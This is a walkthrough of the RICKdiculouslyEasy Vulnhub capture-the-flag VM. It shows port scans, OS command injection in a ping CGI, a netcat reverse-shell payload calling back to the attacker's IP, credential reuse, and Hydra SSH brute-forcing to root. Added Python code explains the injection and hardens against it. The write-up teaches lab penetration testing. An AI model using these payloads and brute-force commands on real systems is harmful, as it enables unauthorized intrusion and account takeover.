RICKdiculouslyEasy 1 Vulnhub Walkthrough

So here is some information about the challenge from the creator:

This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.
It’s designed to be a beginner ctf, if you’re new to pen testing, check it out!

https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/

Some feedback from me before you start reading!

This image is perfect for beginners or students.
It is themed after the Rick & Morty series. I am a huge fan, so I really enjoyed it, but even if you don't watch the series you will definitely have fun. But seriously, start the series.
Interesting challenges that are connected to each other and cover a variety of fields and tools.
Generally a really, really fun boot2root to play, maybe one of the best I have ever played.

DO YOURSELF A FAVOR AND PLAY IT. DON'T TAKE TOO MANY SNEAK PEEKS. IT'S PRETTY DOABLE.

Starting with an Nmap scan

nmap -sS -sU -T4 -A -v 192.168.2.2
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.2.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh?
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp   open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp open  http    Cockpit web service
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Did not follow redirect to https://192.168.2.2:9090/

Let's connect to the FTP service

ftp 192.168.2.2
Connected to 192.168.2.2.
220 (vsFTPd 3.0.3)
Name (192.168.2.2:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp>

FLAG{Whoa this is unexpected} – 10 Points

POINTS: 10
POINTS_TO_GO: 120

searchsploit finds no vulnerabilities for vsftpd 3.0.3.
We could brute-force the login, but not for now.

Let's try to log in with SSH on port 22

ssh 192.168.2.2
ssh_exchange_identification: Connection closed by remote host
Nothing we can do here. Nmap also could not identify a version for this port.

Let's move on to port 80

nikto -h 192.168.2.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.2
+ Target Hostname:    192.168.2.2
+ Target Port:        80
+ Start Time:         2019-01-08 14:52:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.27 (Fedora)
+ Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /passwords/: Directory indexing found.
+ OSVDB-3092: /passwords/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8327 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2019-01-08 14:52:40 (GMT-5) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Let's open http://192.168.2.2
Nothing interesting in the page source or in the image.

Let's view /passwords

We got another flag

FLAG{Yeah d- just don’t do it.} – 10 Points

POINTS: 20
POINTS_TO_GO: 110

Let's open http://192.168.2.2/passwords/passwords.html
Viewing the source reveals a password: “winter”

<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>

Moving to robots.txt

view-source:http://192.168.2.2/cgi-bin/root_shell.cgi

<html><head><title>Root Shell
</title></head>
--UNDER CONSTRUCTION--
<!--HAAHAHAHAAHHAaAAAGGAgaagAGAGAGG-->
<!--I'm sorry Morty. It's a bummer.-->
</html>

I guess Rick is messing with us. That was way too good to be true. 😒

Moving to http://192.168.2.2/cgi-bin/tracertool.cgi

A super cool web page to ping IPs.
When we try 127.0.0.1 we get a response.

Let's try to add another command after the ping

e.g.: 127.0.0.1; id;

DAAAMN Morty 😍, the command is successfully executed and we get text output back.
So we effectively have a crude but perfectly working command shell.
Everything we type after 127.0.0.1; is executed on the server.
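What tracertool.cgi suffers from is classic OS command injection: the target is glued into a shell command line, so a semicolon ends the ping and starts whatever follows. The Python below is an added illustration written for this walkthrough, not the VM's actual tracertool.cgi (the post never shows its source). It places a constructed stand-in for the weak pattern beside a hardened handler that only accepts a bare IP address and runs ping through an argv list with no shell. The function names (vulnerable_trace, validate_target, hardened_trace_cmd, looks_injected) are my own; the sample targets are the page's payloads, embedded here as constructed input.

```python
import ipaddress
import re
import subprocess

# Characters a POSIX shell treats specially. Any of them inside a "ping target"
# parameter is a strong sign of an injection attempt in access logs or form data.
SHELL_META = re.compile(r"[;&|`$()<>\\\n]")


def vulnerable_trace(target):
    """Constructed stand-in for the weak pattern: the user value is pasted into a
    command string that the CGI then hands to a shell (shell=True / os.system).
    With target "127.0.0.1; id;" the shell runs ping AND id."""
    return "ping -c 1 " + target


def validate_target(target):
    """Return the normalised address, or None if target is not a bare IPv4/IPv6
    address. "127.0.0.1; id;" fails because ipaddress refuses the extra text."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        return None


def hardened_trace_cmd(target):
    """Build an argv list for ping from a validated address. No shell is
    involved, so metacharacters are never interpreted even if validation
    were loosened later."""
    addr = validate_target(target)
    if addr is None:
        raise ValueError("target must be a bare IPv4/IPv6 address")
    return ["ping", "-c", "1", addr]


def run_trace(target, timeout=5):
    """Execute the hardened command without a shell and return ping's output."""
    argv = hardened_trace_cmd(target)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return proc.stdout


def looks_injected(value):
    """True if a submitted target contains shell metacharacters; usable as a
    detection rule over web-server logs or as a pre-check in front of the CGI."""
    return SHELL_META.search(value) is not None


if __name__ == "__main__":
    # Constructed sample inputs, including the two payloads used on this page.
    samples = [
        "127.0.0.1",
        "127.0.0.1; id;",
        "127.0.0.1; nc 192.168.2.9 4444 -e /bin/bash;",
    ]
    for sample in samples:
        print(repr(sample))
        print("  weak command line :", repr(vulnerable_trace(sample)))
        print("  hardened accepts  :", validate_target(sample))
        print("  looks injected    :", looks_injected(sample))
```

The hardened path rejects both payloads before anything is executed, and because ping is started from an argv list there is no shell to interpret a semicolon even for input that slips through validation; looks_injected is the cheap log-side check that would have flagged these requests in the Apache access log.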

Testing with the following commands to look around the directories did not return anything useful.

127.0.0.1; ls;
127.0.0.1; cd ..; ls;
127.0.0.1; cd ..; cd ..; ls;

Funny thing: the cat command has been replaced with an ASCII cat! Well, that made me laugh! 😂😂

Then I had an idea. Can I ping my own machine?
And yes I can!

So let's open a basic reverse shell.
I use netcat to start listening on port 4444

nc -lvp 4444

Then I craft the new malicious “ping” command, using netcat to connect back to my IP:PORT with /bin/bash attached

127.0.0.1; nc 192.168.2.9 4444 -e /bin/bash;

And I immediately get a shell back on my machine. 😎

So we got a shell running as the user apache.
I tried to find other interesting files or directories for flags, but with no luck.
We will return here really soon.
Let's view port 9090

And we got another flag

FLAG{There is no Zeus, in your face!} – 10 Points

POINTS: 30
POINTS_TO_GO: 100

No hints in the code. Web page seems broken.

So far I have captured a few flags, found a password (“winter”) that I never had the chance to use, and got a reverse shell as the low-privileged user “apache”.

OK, so here I got stuck, even though it is a beginner, RICKdiculouslyEasy machine.
Pretty embarrassing, I know. 😭

So I Googled other write-ups and tried to take only a sneak peek without spoiling everything.
And I found that my Nmap scan had failed massively: I had missed some really important ports.

Let's scan again, this time more carefully. (The -p- parameter scans all ports, 1 to 65535; without it Nmap only probes its default list of the 1000 most common ports, which is why 13337, 22222 and 60000 never showed up.)

nmap -sS 192.168.2.2 -p-

Well that was painful to watch. 😱😱

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:22 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00058s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown

Let's do some service identification on the ports I previously missed.

nmap -sS 192.168.2.2 -p 9090,13337,22222,60000 -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-08 16:24 EST
Nmap scan report for 192.168.2.2 (192.168.2.2)
Host is up (0.00033s latency).

PORT      STATE SERVICE VERSION
9090/tcp  open  http    Cockpit web service
13337/tcp open  unknown
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.70%I=7%D=1/8%Time=5C351522%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.70%I=7%D=1/8%Time=5C351528%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\
SF:.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20rev
SF:erse\x20shell\.\.\.\n#\x20");

We found another SSH service running on 22222, while 13337 and 60000 remain a mystery.
But we got a flag from the banner of the service on 13337

FLAG{TheyFoundMyBackDoorMorty} – 10 Points

POINTS: 40
POINTS_TO_GO: 90

It also says something about a backdoor. Well, that is convenient.
Let's telnet to 13337.

telnet 192.168.2.2 13337

Nope, nothing.

telnet 192.168.2.2 13337

Trying 192.168.2.2...
Connected to 192.168.2.2.
Escape character is '^]'.
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connection closed by foreign host.

Moving on to port 60000
This port is interesting from the beginning, as we got this strange but exciting string from the Nmap banner grab.
“Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\.\.\n#\x20”

nc 192.168.2.2 60000

Thank you Rick! You might be a super genius asshole but I guess you kinda suck at InfoSec.

ls returns another flag

FLAG{Flip the pickle Morty!} – 10 Points

POINTS: 50
POINTS_TO_GO: 80

Let's run whoami

OMG Ricky! You filthy irresponsible animal! 😱😂😂

We are root but strangely can't change directory. ls returns only the flag.txt

I can't escape the blackhole directory. I guess the name is not random at all.

Let's move on to port 22222

Tried to connect as root: ssh root@192.168.2.2 -p 22222
The only password I know is winter.

No luck.

The good thing is that now we have an SSH service that is at least accepting connections. (Port 22 was refusing every connection.)

Maybe this password belongs to another user. I have to find other users; they are listed in /etc/passwd.
How am I going to read this file?

Back to the netcat shell I opened in the terminal, which runs as apache.

cat /etc/passwd

That fucking cat again. I totally forgot about it.

I need another simple program to read the content. nano and vim won't work as I am connected through a plain nc session.

I know that head shows the top lines of a text file, but new users are usually located at the bottom of the passwd file.
So I use less

less /etc/passwd

Hell yeah!👌

RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

Let's try them on port 22222

ssh RickSanchez@192.168.2.2 -p 22222
RickSanchez@192.168.2.2's password: 
Permission denied, please try again.

ssh Morty@192.168.2.2 -p 22222
Morty@192.168.2.2's password: 
Permission denied, please try again.

ssh Summer@192.168.2.2 -p 22222
Summer@192.168.2.2's password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@desktop-7f9m85h ~]$ 

ls reveals another flag.

FLAG{Get off the high road Summer!} – 10 Points

POINTS: 60
POINTS_TO_GO: 70

Ohhh I get it. Summer & Winter👀

So this is getting really interesting.

Starting with Morty's home directory, I want to download his files to my local machine, so I use scp.

scp -P 22222 Summer@192.168.2.2:/home/Morty/Safe_Password.jpg /root/Downloads/Morty
and again
scp -P 22222 Summer@192.168.2.2:/home/Morty/journal.txt.zip /root/Downloads/Morty

journal.txt.zip is password protected. No idea what the password is, but I guess those two files are connected, so maybe the password is in the Safe_Password.jpg file.

Here is the image; nothing shows up at first sight. I guess it is time for some steganography.

I don't know much about steg, so I Googled and found some tools like exiftool, steghide and stegosuite.

No luck with exiftool
No luck with steghide
No luck with stegosuite

I even manually zoomed in on Rick's teeth to find a secret password. Nothing 😩

Stuck again.

Googled, again.

strings Safe_Password.jpg

Successfully unzipped journal.txt.zip with the password “Meeseek” found in the strings output.

And we got another flag!

FLAG: {131333} – 20 Points

POINTS: 80
POINTS_TO_GO: 50

Now moving to the /home/RickSanchez directory to download his files to our local machine.

scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/ThisDoesntContainAnyFlags/NotAFlag.txt /root/Downloads/Rick
scp -P 22222 Summer@192.168.2.2:/home/RickSanchez/RICKS_SAFE/safe /root/Downloads/Rick

So NotAFlag.txt is actually not a flag, even if I am not really convinced yet. So let's keep

The file safe looks like an executable. Maybe I should try running it on Rick's server.

It is indeed an executable, but I cannot run it.

I tried the su command, but apparently Summer is not in the sudoers group.

Summer doesn't have the proper permissions to execute the file, but we don't really care because we have already downloaded it to our host machine.

It says something about arguments. So we have to pass an argument to the executable, and I am pretty sure that would be the password.

After a few tries I opened it with a previous flag, the numeric one (131333). A safe, remember? 😁

And by passing that password as an argument we successfully executed the safe.

FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

POINTS: 100
POINTS_TO_GO: 30

So this is a password reminder for Rick.
We have to understand what he means by that.
Huge fan of the series, but I don't remember his band (sorry Rick 😋).
But God bless Google

So it is called “The Flesh Curtains” LOL

Here is a poster

Let's follow his directions and build the password. Probably the root password, from what he says.

1 uppercase character
1 digit
One of the words in my old band's name.

So we have to create a wordlist: [one uppercase letter A-Z][one digit 0-9][“The” or “Flesh” or “Curtains”]

Let's use crunch. I Googled A LOT to find out how to create the appropriate wordlist.
There are multiple methods, but this one seemed the easiest to me. (In a crunch -t pattern, "," stands for one uppercase letter and "%" for one digit; every other character is taken literally.)

crunch 5 5 -t ,%The > the_wordlist.txt
crunch 7 7 -t ,%Flesh > flesh_wordlist.txt
crunch 10 10 -t ,%Curtains > curtains_wordlist.txt
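To make the point about how little the "reminder" leaves to guess, here is an added Python example, written for this walkthrough and not part of the original post or of crunch itself. It expands crunch-style -t patterns with the same placeholder meaning (@ lowercase, "," uppercase, % digit, ^ symbol; the symbol set used here is an assumption, crunch's own default list is longer) and counts the candidates instead of only writing them to a file. The ",%" prefix and the three band words are the ones from the page; the function names are my own.

```python
import itertools
import math
import string

# crunch -t placeholder classes. The symbol set is an assumption for this
# example; crunch's real default symbol list is longer.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def slots_for(pattern):
    """Map each pattern character to the characters it may take.
    Placeholders expand to their class; any other character is literal."""
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def expand_pattern(pattern):
    """Yield every candidate a crunch-style -t pattern describes
    (",%The" -> A0The, A1The, ..., Z9The)."""
    for combo in itertools.product(*slots_for(pattern)):
        yield "".join(combo)


def keyspace_size(pattern):
    """Number of candidates the pattern describes, without enumerating them."""
    return math.prod(len(slot) for slot in slots_for(pattern))


def entropy_bits(candidates):
    """Guessing entropy (log2 of the candidate count) for a uniform choice."""
    return math.log2(candidates)


def build_wordlist(words, prefix=",%"):
    """The policy from Rick's reminder: one uppercase letter, one digit, then
    one of the band's words. Returns every candidate across all words, i.e.
    the union of the three crunch runs on the page."""
    out = []
    for word in words:
        out.extend(expand_pattern(prefix + word))
    return out


if __name__ == "__main__":
    band = ["The", "Flesh", "Curtains"]
    wordlist = build_wordlist(band)
    print(len(wordlist), "candidates,",
          round(entropy_bits(len(wordlist)), 1), "bits of guessing entropy")
    print("P7Curtains present:", "P7Curtains" in wordlist)
    # Contrast: ten unconstrained lowercase letters, same length as ",%Curtains".
    blind = keyspace_size("@" * 10)
    print(round(entropy_bits(blind), 1), "bits for ten unconstrained lowercase letters")
```

The whole policy collapses to 780 candidates, under 10 bits, which is why three short Hydra runs are enough; the same length with no structural hint sits near 47 bits even when restricted to lowercase letters. That gap is the real lesson of the "reminder": a password hint that fixes the structure removes almost all of the entropy.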

And verifying the results

Let's fire up Hydra to brute-force

hydra -l root -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l root -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL

Starting to freak out…😧

hydra -l RickSanchez -P the_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P flesh_wordlist.txt ssh://192.168.2.2 -s 22222
FAIL
hydra -l RickSanchez -P curtains_wordlist.txt ssh://192.168.2.2 -s 22222

SUCCESS! P7Curtains is the password

Now let's connect.

FINALLY!

Now Rick mentioned that “sudo is wheely good!”

Let's try the su command again. And success: we are root and found the last flag.

FLAG: {Ionic Defibrillator} – 30 points

POINTS: 130
POINTS_TO_GO: 0

——————————————

Lessons learned:
1) I should be more careful with port scanning.
2) I should practice more on steg.
